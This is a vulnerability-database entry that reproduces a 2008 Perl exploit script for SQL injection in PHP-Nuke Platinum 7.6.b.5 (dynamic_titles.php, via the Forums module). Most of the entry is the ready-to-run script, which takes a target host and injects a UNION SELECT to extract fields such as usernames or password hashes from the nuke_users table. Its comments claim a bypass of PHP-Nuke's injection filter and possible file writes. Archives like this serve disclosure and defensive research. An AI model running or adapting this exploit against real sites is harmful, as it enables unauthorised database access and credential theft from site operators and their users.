Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection Exploit

🗓️ 23 Mar 2008 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 48 Views

PHP-Nuke Platinum 7.6.b.5 SQL Injection exploit in dynamic_titles.ph

Code

                                                #!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id 	name 	username 	user_email 	femail 	user_website 	user_avatar 	user_regdate 	user_icq 	user_occ 	user_from 	user_interests 	user_sig 	user_viewemail 	user_theme 	user_aim 	user_yim 	user_msnm 	user_password 	storynum 	umode 	uorder 	thold 	noscore 	bio 	ublockon 	ublock 	theme 	commentmax 	counter 	newsletter 	user_posts 	user_attachsig 	user_rank 	user_level 	broadcast 	popmeson 	user_active 	user_session_time 	user_session_page 	user_lastvisit 	user_timezone 	user_style 	user_lang 	user_dateformatuser_new_privmsg 	user_unread_privmsg 	user_last_privmsg 	user_emailtime 	user_allowhtml 	user_allowbbcode 	user_allowsmile 	user_allowavatar 	user_allow_pm 	user_allow_viewonline 	user_notify 	user_notify_pm 	user_popup_pm 	user_avatar_type 	user_sig_bbcode_uid user_actkey 	user_newpasswd 	last_ip 	user_color_gc 	user_color_gi 	user_quickreply 	user_allow_arcadepm 	kick_ban 	user_wordwrap 	agreedtos 	user_view_log 	user_effects 	user_privs 	user_custitle 	user_specmsg 	user_items 	user_trade 	points 	user_cash 	last_seen_blocker 	user_login_tries 	user_last_login_try 	user_gender 	user_birthday 	user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
	$a++;
	while (($k, $v) = each(%cm_n_)) {
		if ($_ eq $k) {
			${$v} = $ARGV[$a];
		}
	}
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
	$url = shift;
	$reg = shift;


	$ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;

	if ($content=~m/$reg/) {
	    ($f,$s,$l) = split(">>",$1);
	    $s =~s/ Post //;
	    print $column.":".$s."\n";
	}
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Mar 2008 00:00Current
7.1High risk
Vulners AI Score7.1
sql injectionphp-nuke platinumdynamic_titles.phplwp::useragentio::socketsql injection protectionmagic_quotes_gpcforumsmaintenance/index.phpfile write.
48